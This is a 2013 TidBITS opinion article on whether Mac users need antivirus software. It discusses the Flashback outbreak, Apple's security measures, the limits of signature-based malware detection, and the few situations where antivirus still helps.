It has been over four years since I wrote “Should Mac Users Run Antivirus Software?” (18 March 2008). Although much has changed since then, my recommendations mostly haven’t. While Macs aren’t immune to malicious software (malware), and we even experienced one reasonably widespread incident in 2012, malware on Macs is still not nearly common enough to recommend antivirus software for everyone. And while antivirus tools are effective against certain known attacks, they often don’t provide the level of protection people expect.
More Malware, but Still Rare -- In April 2012, we experienced Flashback, the first real, widespread malware attack against Macs (see “How to Detect and Protect Against Updated Flashback Malware,” 5 April 2012). By some accounts over 500,000 Macs were infected at one point, but there is no evidence that any infected Macs or Mac users were actually harmed in the attack. This quickly led to predictions in certain corners that the Apple “age of innocence” had come to an end, and Mac users would now face as many and as severe malware attacks as Windows users.
Since that fateful week we have seen not a single additional widespread attack, and only a handful of smaller pockets of infection similar to the pre-Flashback days. (Note that there were some attacks against specific targets, but antivirus is relatively ineffective at stopping these.) Despite those predictions, Mac users haven’t seen any significant increases in malware, and it is still quite rare.
Some of this is due to steps Apple took both before and in response to Flashback, which I outlined in “Examining Apple’s Security Efforts in 2012” (20 December 2012). Gatekeeper was designed to reduce the likelihood of a user being tricked into installing malware on their own computer — still the most common attack against Macs (see “Gatekeeper Slams the Door on Mac Malware Epidemics,” 16 February 2012). Apple continues to harden the operating system itself, making it more difficult (but far from impossible) to exploit remotely. All apps in the Mac App Store must now implement sandboxing, which reduces the harm they can cause if they are compromised — although, embarrassingly, Apple has yet to sandbox its own apps. And Apple significantly changed how Java and Adobe Flash, the software exploited by Flashback, are supported and enabled to further restrict their use as a vector for infection via a Web browser.
Plus, if reports are accurate, Flashback failed to net any significant profits for the attackers. For the most part, bad guys are in it for the money, and they drop unprofitable product lines like any other business. In fact, Apple’s security changes have, by its own admission, focused more on disrupting the economics of malware than trying to stop any single vector of attack.
This doesn’t mean there won’t be successful attacks against Macs, but all signs point to those attacks being limited — occasional one-off incidents rather than the constant maelstrom of endless attacks we have seen against Windows. The ecosystem — thanks to its size and Apple’s protections — simply can’t support ongoing waves of Mac malware. Even the latest versions of Windows don’t face the same malware issues as earlier efforts.
Some of these future incidents will be widespread, but they will also very likely be discovered and contained quickly. As for antivirus, the odds are against the tools playing a significant role in preventing these attacks due to their inherent limitations.
The Limits of Antivirus -- There are two main ways to detect malicious software: detect unusual activity, or recognize something in the software that marks it as malicious. Nearly all antivirus tools on the market rely mostly or exclusively on “signatures” for malware detection.
A signature is typically a string of text, often a hash value of a portion of a known piece of malware. Antivirus companies scour the Internet looking for malware samples. Once they find a malicious program, they create a signature based on the application’s code, then push this signature into the antivirus software on your computer when you update your virus definitions. Your antivirus software scans new files as they come into your computer, plus all files on your system periodically, looking for these signatures.
Security tools tend to avoid relying on behavioral analysis because it is very hard to know whether any particular action on a general purpose computer is “bad.” For any malicious action you can think of, odds are there is a legitimate reason for that activity in a different context. It is also difficult to hook into an operating system at the right level to capture this activity. And unless you detect and manage to prevent the act of infection (which may look exactly like normal software installation), the malware gets to run on your system before the tool has an opportunity to detect bad activity. Behavioral analysis is thus fairly limited, and more effective in controlled environments, such as enterprise servers, than on personal computers.
The advantage of signature scanning is that if there is a match, and the signature is well-crafted, you have positively identified a known piece of malicious software. You can also scan software before it ends up on your system or runs in the first place. But there are two very large downsides.
The most obvious limitation is that to create a signature, the antivirus vendor needs a sample of the malware. They can build signatures only for what they find, meaning new malware always has some running time before the first sample is collected, turned into a signature, and pushed down to client computers. Not every malicious program is created from scratch, so theoretically an antivirus tool should have a reasonable chance of picking up new variants. But the bad guys know this and buy the major antivirus programs to test their variants before release. Or, if they are on a budget, they run the samples through sites like VirusTotal, which test samples against dozens of antivirus tools.
The second major issue is that malware is a popular market, with massive numbers of new variants appearing daily. Some antivirus vendors report on the order of 65,000 new malware variations every day! That is 65,000 signatures they need to create, test, and release to their customers on a daily basis (now you know why it’s important to update virus definitions). Together these two factors make it nearly impossible for antivirus vendors to keep up. Their tools do filter a lot of malware, but never get close to catching everything bad, and there is always a window where new malware spreads before being detected.
Far less malware exists for Macs, but even there we see limited effectiveness across tools. For example, in a recent test by Thomas Reed, even the best Mac malware tool detected only 90 percent of the known malware samples used. This is a poor showing — we only see dozens of Mac malware variants per year, compared to 65,000 per day for Windows.
Despite Flashback being used as a call to arms to encourage people to adopt antivirus tools, most of those tools failed to detect Flashback for weeks — until it was highly publicized.
There are additional technical issues, as well. The more analysis and detection you want, the deeper antivirus tools need to hook into your system, and the greater their potential for failure. Apple doesn’t help much, being much more concerned with preventing malware from taking over the operating system than with helping antivirus vendors — who, after all, need to monitor all access to files and exercise control over launching applications and opening files, which are just the kinds of things malware authors want to do, too. There are also major performance impacts, and nearly every antivirus vendor has issued a bad signature at some point, causing serious issues for customers — typically false claims that a critical system or application file is a virus, which of course causes problems when the software attempts to prevent the (critical, legitimate) file from “compromising” the system.
Considering the current state of Mac security and the malware environment today, I find it hard to recommend Mac antivirus tools for most consumers. OS X’s built-in security and basic malware protection currently stops most or even all existing Mac malware, and new malware variants don’t appear often enough for antivirus tools to provide a significant benefit by protecting personal Macs. Mac infections are so rare, and antivirus tools are so limited, that they simply don’t offer enough value for most Mac users — even the free ones.
When to Use Mac Antivirus -- Those limitations aside, there are situations where antivirus software is still useful.
The first, and best, is when you don’t use it on the desktop. Signature-based filtering in email stops known viruses before they ever hit your desktop. I highly recommend using an email service such as Gmail, iCloud, Yahoo, or Hotmail that filters all email for viruses before it is downloaded your computer. For businesses I also recommend Web filtering, but that isn’t easily available to regular consumers.
The next group who might benefit from antivirus is family members running older versions of OS X. Nearly all the best anti-malware security features of OS X are available with 10.8 Mountain Lion, with 10.7 Lion being second-best. We know TidBITS readers largely stay up to date with Mac and iOS operating system updates, but if family members don’t, then antivirus may be warranted.
Corporate users may also need antivirus software to comply with corporate policies or other requirements.
If you consistently engage in high-risk behavior, then antivirus software may be useful. For example, if you turn off Gatekeeper and routinely download illegal or dubious software, antivirus tools might prevent infection. Maybe. Of course malware appears on mainstream sites as well, but if you stick with Gatekeeper and known developers your chance of infection is almost nil.
Lastly, you might simply want antivirus for peace of mind — understanding that antivirus tools are far from infallible, and their users do still get infected, especially if you ignore the necessary patches and definition updates.
If Mac antivirus tools offered 100 percent effectiveness — or even 99 percent — I might take a different position. If we ever see massive volumes of malware, as happens in the Windows world, I might change my recommendations. But at this point, there are so few Mac malware infections, and antivirus tools are so limited, that for most users of current versions of OS X, antivirus doesn’t make sense.
During the Flashback infection there were accusations that Mac users were too smug, or too ill-informed, to install antivirus software. But the reality is that antivirus tools offer only limited protection, and relying on antivirus for your security is as naive as believing Macs are invulnerable.
Unless otherwise noted, this article is copyright © 2013 TidBITS Publishing, Inc.Published in TidBITS on 2013-01-08.
TidBITS is copyright © 2012 TidBITS Publishing Inc. Reuse governed by Creative Commons License.